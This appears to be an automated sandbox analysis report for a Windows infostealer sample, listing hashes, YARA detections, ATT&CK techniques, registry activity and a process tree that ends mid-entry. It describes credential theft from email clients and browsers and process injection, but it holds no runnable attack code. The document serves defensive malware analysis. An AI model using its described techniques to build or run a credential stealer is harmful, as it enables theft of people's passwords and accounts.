e58c7afbf68aa6364b320af12e3fb65df7c53b534f30c5d1de60c63bfe4fc37e

Analysis

max time kernel
108s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
07/09/2024, 07:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Size

1.0MB
MD5

d16ce7cf123a64124e62853b6334fb85
SHA1

dffee691c7c1010c8a410057ebdce003631055bc
SHA256

e58c7afbf68aa6364b320af12e3fb65df7c53b534f30c5d1de60c63bfe4fc37e
SHA512

1f29aa8b81eaf72f4f05e37c200d1be4acb1c3d050951e0783b6e7ff8de17983b2bf1338107bcf03766f353e40c809a7dca90abc403e2af5dd1a2f99b2bfdb1b
SSDEEP

24576:W6Fv2eEgqRryI/iN3czSX+2RSSeqSE6EbwWFxI8yA/q24io3:lF+JJyyP+2McGPn/U

Score

9^/10

collection discovery spyware stealer upx

Malware Config

Signatures

Detected Nirsoft tools 16 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/2376-33-0x0000000000400000-0x0000000000416000-memory.dmp	Nirsoft
behavioral2/memory/2948-39-0x0000000000400000-0x0000000000415000-memory.dmp	Nirsoft
behavioral2/memory/2948-38-0x0000000000400000-0x0000000000415000-memory.dmp	Nirsoft
behavioral2/memory/2376-32-0x0000000000400000-0x0000000000416000-memory.dmp	Nirsoft
behavioral2/memory/4244-27-0x0000000000400000-0x0000000000418000-memory.dmp	Nirsoft
behavioral2/memory/4244-26-0x0000000000400000-0x0000000000418000-memory.dmp	Nirsoft
behavioral2/memory/3964-16-0x0000000000400000-0x0000000000431000-memory.dmp	Nirsoft
behavioral2/memory/3964-15-0x0000000000400000-0x0000000000431000-memory.dmp	Nirsoft
behavioral2/memory/4460-13-0x0000000000400000-0x000000000041D000-memory.dmp	Nirsoft
behavioral2/memory/4460-12-0x0000000000400000-0x000000000041D000-memory.dmp	Nirsoft
behavioral2/memory/4200-11-0x0000000000400000-0x000000000043D000-memory.dmp	Nirsoft
behavioral2/memory/4200-10-0x0000000000400000-0x000000000043D000-memory.dmp	Nirsoft
behavioral2/memory/3892-19-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral2/memory/3892-18-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral2/memory/2928-42-0x0000000000400000-0x0000000000425000-memory.dmp	Nirsoft
behavioral2/memory/2928-41-0x0000000000400000-0x0000000000425000-memory.dmp	Nirsoft

NirSoft MailPassView 2 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/4460-13-0x0000000000400000-0x000000000041D000-memory.dmp	MailPassView
behavioral2/memory/4460-12-0x0000000000400000-0x000000000041D000-memory.dmp	MailPassView

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 36 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4200-0-0x0000000000400000-0x000000000043D000-memory.dmp	upx
behavioral2/memory/3892-1-0x0000000000400000-0x000000000041B000-memory.dmp	upx
behavioral2/memory/3964-6-0x0000000000400000-0x0000000000431000-memory.dmp	upx
behavioral2/memory/4460-4-0x0000000000400000-0x000000000041D000-memory.dmp	upx
behavioral2/memory/2928-20-0x0000000000400000-0x0000000000425000-memory.dmp	upx
behavioral2/memory/4244-25-0x0000000000400000-0x0000000000418000-memory.dmp	upx
behavioral2/memory/2376-33-0x0000000000400000-0x0000000000416000-memory.dmp	upx
behavioral2/memory/2948-39-0x0000000000400000-0x0000000000415000-memory.dmp	upx
behavioral2/memory/2948-38-0x0000000000400000-0x0000000000415000-memory.dmp	upx
behavioral2/memory/2948-37-0x0000000000400000-0x0000000000415000-memory.dmp	upx
behavioral2/memory/2948-35-0x0000000000400000-0x0000000000415000-memory.dmp	upx
behavioral2/memory/2376-32-0x0000000000400000-0x0000000000416000-memory.dmp	upx
behavioral2/memory/2376-31-0x0000000000400000-0x0000000000416000-memory.dmp	upx
behavioral2/memory/2376-29-0x0000000000400000-0x0000000000416000-memory.dmp	upx
behavioral2/memory/4244-27-0x0000000000400000-0x0000000000418000-memory.dmp	upx
behavioral2/memory/4244-26-0x0000000000400000-0x0000000000418000-memory.dmp	upx
behavioral2/memory/2928-24-0x0000000000400000-0x0000000000425000-memory.dmp	upx
behavioral2/memory/4244-22-0x0000000000400000-0x0000000000418000-memory.dmp	upx
behavioral2/memory/3892-17-0x0000000000400000-0x000000000041B000-memory.dmp	upx
behavioral2/memory/3964-16-0x0000000000400000-0x0000000000431000-memory.dmp	upx
behavioral2/memory/3964-14-0x0000000000400000-0x0000000000431000-memory.dmp	upx
behavioral2/memory/3964-15-0x0000000000400000-0x0000000000431000-memory.dmp	upx
behavioral2/memory/4460-13-0x0000000000400000-0x000000000041D000-memory.dmp	upx
behavioral2/memory/4460-12-0x0000000000400000-0x000000000041D000-memory.dmp	upx
behavioral2/memory/4200-11-0x0000000000400000-0x000000000043D000-memory.dmp	upx
behavioral2/memory/4200-10-0x0000000000400000-0x000000000043D000-memory.dmp	upx
behavioral2/memory/4460-9-0x0000000000400000-0x000000000041D000-memory.dmp	upx
behavioral2/memory/3892-19-0x0000000000400000-0x000000000041B000-memory.dmp	upx
behavioral2/memory/3892-18-0x0000000000400000-0x000000000041B000-memory.dmp	upx
behavioral2/memory/4200-7-0x0000000000400000-0x000000000043D000-memory.dmp	upx
behavioral2/memory/2928-42-0x0000000000400000-0x0000000000425000-memory.dmp	upx
behavioral2/memory/2928-41-0x0000000000400000-0x0000000000425000-memory.dmp	upx
behavioral2/memory/792-62-0x0000000000400000-0x0000000000410000-memory.dmp	upx
behavioral2/memory/792-65-0x0000000000400000-0x0000000000410000-memory.dmp	upx
behavioral2/memory/792-66-0x0000000000400000-0x0000000000410000-memory.dmp	upx
behavioral2/memory/792-64-0x0000000000400000-0x0000000000410000-memory.dmp	upx

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe

Suspicious use of SetThreadContext 10 IoCs

description	pid	Process	procid_target
PID 4224 set thread context of 4200	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	87
PID 4224 set thread context of 3892	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	88
PID 4224 set thread context of 4460	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	89
PID 4224 set thread context of 3964	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	90
PID 4224 set thread context of 2928	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	91
PID 4224 set thread context of 4244	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	92
PID 4224 set thread context of 2376	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	93
PID 4224 set thread context of 2948	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	94
PID 4224 set thread context of 3156	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	102
PID 4224 set thread context of 792	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	106

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe

Modifies Internet Explorer settings 1 TTPs 41 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31129850"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2040308672"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001bc9387f4f791b45af7c7e57591307f100000000020000000000106600000001000020000000f2e3985b818279c2356c014814f18e401a3fb550035ee5fccc6d79e5171c8f17000000000e800000000200002000000074101991ccaa80fe71941d38b762fd231f3126b581587e9b70d06a0a9cb2392e200000007f6cfe363b4172771838fc563f0d0397ca04488518db141acbeb67f6fca58bed400000009d67c4d9a44b7d34792cee372d4f6d31bf9c3984fffd611c7650f886a7c5b68d980b70f9c4af34462e14b45b3bfe80381d7f4a8aad350d11d9972c9809abf467	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "432460315"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{A50FFC2E-6CED-11EF-BB4F-CA89CBF88D4A} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2038902334"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31129850"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001bc9387f4f791b45af7c7e57591307f100000000020000000000106600000001000020000000d7d7389d88680012c2abac64e04c729202870ecc4f5028ccb882422c00a01835000000000e8000000002000020000000c81d7b630e273286c6eda3307ed3fb642ee96c9ae9b6432bf1dc7318045cadd520000000bc5f834e1cc66a7d2dbdd361aeddf3c3015b0c6f2a93a942239960ea80f601a0400000007f1d09e875f535e89e27f186f02fa76375393fa2492ec182d87a319a85198bf4dbbfb38e00533a21a510995a5c2490ec55093857811fb445cea827189e060fa9	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31129850"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 200a607afa00db01	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2038902334"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 1036677afa00db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
2928	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
2928	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3892	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Token: SeRestorePrivilege	3892	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Token: SeBackupPrivilege	3892	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Token: SeDebugPrivilege	2928	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
496	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
496	iexplore.exe
496	iexplore.exe
4852	IEXPLORE.EXE
4852	IEXPLORE.EXE
4852	IEXPLORE.EXE
4852	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 61 IoCs

description	pid	Process	procid_target
PID 4224 wrote to memory of 4200	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	87
PID 4224 wrote to memory of 4200	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	87
PID 4224 wrote to memory of 4200	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	87
PID 4224 wrote to memory of 4200	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	87
PID 4224 wrote to memory of 4200	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	87
PID 4224 wrote to memory of 3892	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	88
PID 4224 wrote to memory of 3892	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	88
PID 4224 wrote to memory of 3892	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	88
PID 4224 wrote to memory of 3892	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	88
PID 4224 wrote to memory of 3892	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	88
PID 4224 wrote to memory of 4460	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	89
PID 4224 wrote to memory of 4460	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	89
PID 4224 wrote to memory of 4460	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	89
PID 4224 wrote to memory of 4460	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	89
PID 4224 wrote to memory of 4460	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	89
PID 4224 wrote to memory of 3964	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	90
PID 4224 wrote to memory of 3964	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	90
PID 4224 wrote to memory of 3964	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	90
PID 4224 wrote to memory of 3964	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	90
PID 4224 wrote to memory of 3964	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	90
PID 4224 wrote to memory of 2928	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	91
PID 4224 wrote to memory of 2928	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	91
PID 4224 wrote to memory of 2928	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	91
PID 4224 wrote to memory of 2928	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	91
PID 4224 wrote to memory of 2928	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	91
PID 4224 wrote to memory of 4244	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	92
PID 4224 wrote to memory of 4244	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	92
PID 4224 wrote to memory of 4244	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	92
PID 4224 wrote to memory of 4244	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	92
PID 4224 wrote to memory of 4244	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	92
PID 4224 wrote to memory of 2376	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	93
PID 4224 wrote to memory of 2376	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	93
PID 4224 wrote to memory of 2376	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	93
PID 4224 wrote to memory of 2376	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	93
PID 4224 wrote to memory of 2376	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	93
PID 4224 wrote to memory of 2948	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	94
PID 4224 wrote to memory of 2948	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	94
PID 4224 wrote to memory of 2948	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	94
PID 4224 wrote to memory of 2948	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	94
PID 4224 wrote to memory of 2948	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	94
PID 4224 wrote to memory of 3156	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	102
PID 4224 wrote to memory of 3156	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	102
PID 4224 wrote to memory of 3156	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	102
PID 4224 wrote to memory of 3156	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	102
PID 4224 wrote to memory of 3156	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	102
PID 4224 wrote to memory of 792	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	106
PID 4224 wrote to memory of 792	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	106
PID 4224 wrote to memory of 792	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	106
PID 4224 wrote to memory of 792	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	106
PID 4224 wrote to memory of 792	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	106
PID 4224 wrote to memory of 496	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	107
PID 4224 wrote to memory of 496	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	107
PID 496 wrote to memory of 4852	496	iexplore.exe	108
PID 496 wrote to memory of 4852	496	iexplore.exe	108
PID 496 wrote to memory of 4852	496	iexplore.exe	108
PID 792 wrote to memory of 1208	792	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	109
PID 792 wrote to memory of 1208	792	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	109
PID 792 wrote to memory of 1208	792	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	109
PID 4224 wrote to memory of 4964	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	110
PID 4224 wrote to memory of 4964	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	110
PID 4224 wrote to memory of 4964	4224	d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe	110

C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4224
- C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
  "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_1.sys
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4200
- C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
  "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_2.sys
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:3892
- C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
  "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_3.sys
  2⤵
  - Accesses Microsoft Outlook accounts
  - System Location Discovery: System Language Discovery
  PID:4460
- C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
  "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_4.sys
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3964
- C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
  "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_5.sys
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2928
- C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
  "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_7.sys
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4244
- C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
  "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_8.sys
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2376
- C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
  "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_9.sys
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2948
- C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
